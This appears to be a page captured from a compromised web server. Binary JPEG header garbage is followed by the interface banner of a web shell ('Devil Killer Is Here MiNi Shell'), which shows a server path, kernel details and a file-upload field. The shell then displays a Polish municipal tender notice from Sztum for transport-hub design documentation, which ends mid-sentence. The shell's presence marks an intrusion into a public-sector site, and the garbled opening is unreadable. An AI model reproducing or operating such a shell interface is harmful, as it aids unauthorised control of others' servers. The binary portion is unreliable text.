JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210730/0013303901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00133039 z dnia 2021-07-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie dokumentacji dla zadania pn.Budowa węzła integr, wokół dworca PKP w Sztumie wraz z drogami obsługującymi swoim zakresem ul. Reja,Kościuszki,Żeromskiego,Kasprowicza, pl. przed dworcem PKP” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Sztum</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170747773</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mickiewicza 39</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sztum</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">55-640-63-03</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">55-640-63-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sztum@sztum.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.sztum.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie dokumentacji dla zadania pn.Budowa węzła integr, wokół dworca PKP w Sztumie wraz z drogami obsługującymi swoim zakresem ul. Reja,Kościuszki,Żeromskiego,Kasprowicza, pl. przed dworcem PKP” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9b319966-f13d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00133039</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005234/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 OPracowanie dokumentacji projektowej na budowę węzła integracyjnego przy dworcu PKP w Sztumie wraz z trasami dojazdowymi oraz ścieżkami pieszo rowerowymi i rondem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sztum <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sztum</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej oraz wymogu użycia podpisu elektronicznego znajdują się w SWZ w szczególności w rozdziale II, IX, X, XX.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	administratorem Pani/Pana danych osobowych jest: Burmistrz Miasta i Gminy Sztum, <br/>ul. Mickiewicza 39, 82-400 Sztum; <br/>b)	dane kontaktowe inspektora ochrony danych w Urzędzie Miasta i Gminy Sztum to iod@sztum.pl ;<br/>c)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Opracowanie kompleksowej dokumentacji projektowej dla zadania pod nazwą: Budowa węzła integracyjnego wokół dworca PKP w Sztumie wraz z drogami obsługującymi obejmującymi swoim zakresem ulicę Reja, Kościuszki, Żeromskiego, Kasprowicza, plac przed dworcem PKP”, nr sprawy: IM.271.20.2021 prowadzonym w trybie podstawowym;<br/>d)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843) dalej „ustawa Pzp”; <br/>e)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia;<br/>f)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>g)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IM.271.20.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowej dla zadania pod nazwą: „Budowa węzła integracyjnego wokół dworca PKP w Sztumie wraz <br/>z drogami obsługującymi obejmującego swoim zakresem ulicę Reja, Kościuszki, Żeromskiego, Kasprowicza, plac przed dworcem PKP” w tym:<br/>- Część I obejmująca drogi powiatowe,<br/>- Część II obejmująca pozostałe tereny zamierzenia inwestycyjnego.<br/>2.	Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>a)	Uzyskanie aktualnej mapy do celów projektowych w skali 1:500 w formie papierowej i dxf w zakresie niezbędnym do opracowania dokumentacji projektowej będącej przedmiotem niniejszego zamówienia,<br/>b)	Opracowanie koncepcji projektu zagospodarowania terenu w terminie 4 miesięcy od dnia podpisania umowy,<br/>c)	Opracowanie projektu zagospodarowania terenu (5 egz.),<br/>d)	Opracowanie projektu architektoniczno-budowlanego (5 egz.),<br/>e)	Opracowanie projektu technicznego (4 egz.),<br/>f)	Opracowanie projektu zieleni i nasadzeń (4egz.),<br/>g)	Opracowanie szczegółowej specyfikacji technicznej wykonania i odbioru robót budowlanych (3 egz.),<br/>h)	Opracowanie przedmiaru robót (2 egz.),<br/>i)	Opracowanie kosztorysu inwestorskiego (2 egz.),<br/>j)	Zatwierdzony projekt stałej organizacji ruchu drogowego (3 egz.),<br/>k)	Zatwierdzony projekt organizacji ruchu na czas budowy (3 egz.),<br/>l)	Dokumentacja geotechniczna (2 egz.),<br/>m)	Przekazanie przedmiotu zamówienia w wersji edytowalnej np. doc, dwg, ath oraz pdf – (1egz.),<br/>n)	Dwukrotna aktualizacja kosztorysu inwestorskiego na wniosek Zamawiającego,<br/>o)	Uzyskanie na własny koszt niezbędnych do wykonania przedmiotu zamówienia i uzyskania pozwolenia na budowę opracowań (np.: operatów, raportów, powiązanych projektów), badań, uzgodnień branżowych, warunków technicznych, decyzji, pozwoleń, ekspertyz, opinii oraz odstępstw od obowiązujących przepisów. Oryginały dokumentów Wykonawca przekaże w oddzielnej teczce.<br/>p)	Przeprowadzenie procedury i uzyskanie decyzji o środowiskowych uwarunkowaniach.<br/>q)	Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ),<br/>r)	Uzyskanie prawomocnego pozwolenia na budowę dla każdego zakresu oddzielnie,<br/>s)	Opracowywanie odpowiedzi na pytania składane na etapie postępowania o udzielenie zamówienia publicznego na roboty objęte dokumentacją.<br/>3.	Zakres prac projektowych obejmuje zaprojektowanie:<br/>1)	przebudowy ulic Reja, Kościuszki, Żeromskiego, Kasprowicza oraz placu przed dworcem PKP wraz z ciągami pieszo – rowerowymi,<br/>2)	budowy parkingów typu Park&Ride dla samochodów osobowych, motocykli i rowerów, parkingu typu Kiss&Ride oraz dla busów i autobusów, <br/>3)	budowy kanału technologicznego,<br/>4)	budowy kanalizacji deszczowej z uwzględnieniem rozwiązań dla błękitno – zielonej infrastruktury,<br/>5)	przebudowy sieci wodociągowej wraz z uwzględnieniem zabezpieczenia przeciwpożarowego (hydranty),<br/>6)	budowy oświetlenia ulicznego z zastosowaniem opraw LED i podłączeniem do istniejącego systemu zarządzania oświetleniem,<br/>7)	usunięcia występujących kolizji z istniejącą infrastrukturą,<br/>8)	zagospodarowania terenów zielonych z uwzględnieniem rozwiązań dla błękitno – zielonej infrastruktury,<br/>9)	małej architektury wraz z tablicami informacyjnymi,<br/>10)	pionowego i poziomego oznakowania drogowego z zastosowaniem aktywnego oświetlenia drogowego.<br/>3.	Dokumentację projektową należy wykonać dla każdego zakresu oddzielnie.<br/>4.	Na danym odcinku projekt ma uwzględniać przebudowę skrzyżowań zwykłych na skrzyżowania okrężne typu rondo oraz wykonanie elementów uspokojenia ruchu (wyniesione przejście dla pieszych, progi zwalniające, wprowadzenie strefy TEMPO 30). <br/>5.	Zamawiający wymaga uzyskania pisemnej akceptacji Zamawiającego do przedłożonej koncepcji projektu zagospodarowania terenu. Szczegółowe rozwiązania projektowe w zakresie każdej dokumentacji będą uzgadniane docelowo w trakcie ich opracowywania. <br/>6.	Dokumentacja projektowa powinna zawierać rozwiązania techniczne dostosowane do potrzeb wszystkich użytkowników, w tym zapewnienia dostępności dla osób niepełnosprawnych i powinna zawierć opis zastosowanych rozwiązań dostępności dla tych osób.<br/>7.	Świadczenie usługi nadzoru autorskiego w toku wykonywania robót budowlanych zgodnie <br/>z ustawą Prawo Budowlane tj. z dnia 7 lipca 2020 r. (Dz.U. z 2020r. poz. 1333).<br/>8.	Ponadto zakres przedmiotu zamówienia został określony na załącznikach:<br/>1)	Załącznik nr 1 do SWZ - mapa orientacyjna z zaznaczonym terenem zamierzenia inwestycyjnego,<br/>2)	Załącznik nr 2 do SWZ - kopie map zasadniczych terenu zamierzenia inwestycyjnego zawierających uzbrojenie terenu,<br/>3)	Załącznik nr 3 do SWZ - wypisy i wyrysy z MPZP obowiązujących dla danego terenu zamierzenia inwestycyjnego,<br/>4)	Załącznik nr 4 do SWZ – projekt umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z postanowieniami SWZ i Ustawą PZP</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.) „Doświadczenie Wykonawcy”<br/>Warunek zostanie uznany za spełniony wówczas, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną dokumentację projektową na budowę /rozbudowę /przebudowę drogi o nawierzchni bitumicznej i/lub z kostki brukowej betonowej/kamiennej wraz z infrastrukturą towarzyszącą tj. kanalizacją deszczową lub/i kanalizacją sanitarną oraz oświetleniem ulicznym lub/i siecią oświetleniową o wartości nie mniejszej niż 90 000,00 PLN brutto (słownie: dziewięćdziesiąt tysięcy złotych brutto)<br/><br/>2.) „Personel Wykonawcy”<br/>Warunek zostanie uznany za spełniony wówczas, gdy Wykonawca wykaże osoby, które skieruje do realizacji zamówienia: <br/>a)	przynajmniej jedną osobę, która pełnić będzie funkcję Projektanta branży drogowej posiadającą uprawnienia bez ograniczeń do projektowania w specjalności inżynieryjnej drogowej oraz posiada doświadczenie zawodowe przy wykonaniu co najmniej jednej dokumentacji projektowej polegającej na zaprojektowaniu budowy/ rozbudowy/ przebudowy drogi o nawierzchni bitumicznej i/lub z kostki brukowej betonowej/ kamiennej.<br/>a)	przynajmniej jedną osobę, posiadającą uprawnienia bez ograniczeń do projektowania <br/>w specjalności konstrukcyjnej, posiadającej co najmniej 3 lata doświadczenia (licząc od dnia uzyskania uprawnień) w sporządzaniu dokumentacji projektowej,<br/>b)	przynajmniej jedną osobę, posiadającą uprawnienia bez ograniczeń do projektowania <br/>w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych <br/>i kanalizacyjnych, posiadającej co najmniej 1 rok doświadczenia (licząc od dnia uzyskania uprawnień) w sporządzaniu dokumentacji projektowej,<br/>c)	przynajmniej jedną osobę, posiadającą uprawnienia bez ograniczeń do projektowania <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych, posiadającej co najmniej 1 rok doświadczenia (licząc od dnia uzyskania uprawnień) w sporządzaniu dokumentacji projektowej,<br/>d)	przynajmniej jedną osobę, posiadającą uprawnienia bez ograniczeń do projektowania <br/>w specjalności telekomunikacyjnej, posiadającej co najmniej 1 rok doświadczenia (licząc od dnia uzyskania uprawnień) w sporządzaniu dokumentacji projektowej,<br/>e)	przynajmniej jedną osobę, która będzie odpowiedzialna za projektowanie prac związanych z zielenią, posiadająca wykształcenie kierunkowe w zakresie architektury krajobrazu.<br/><br/>Posiadane przez w/w osoby uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 24 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie. <br/>Zamawiający uzna osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji Przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie, jako spełniające przedmiotowy warunek. <br/>Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2017r. poz. 1332 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">f)	Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego dostawy lub usługi zostały wykonane a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów oświadczenie wykonawcy w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych Referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinno być wystawione w okresie ostatnich 3 miesięcy - wzór wykazu osób stanowi załącznik nr 10 do SWZ.<br/>2)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nieczynności oraz informacją o podstawie do dysponowania tymi osobami – wzór 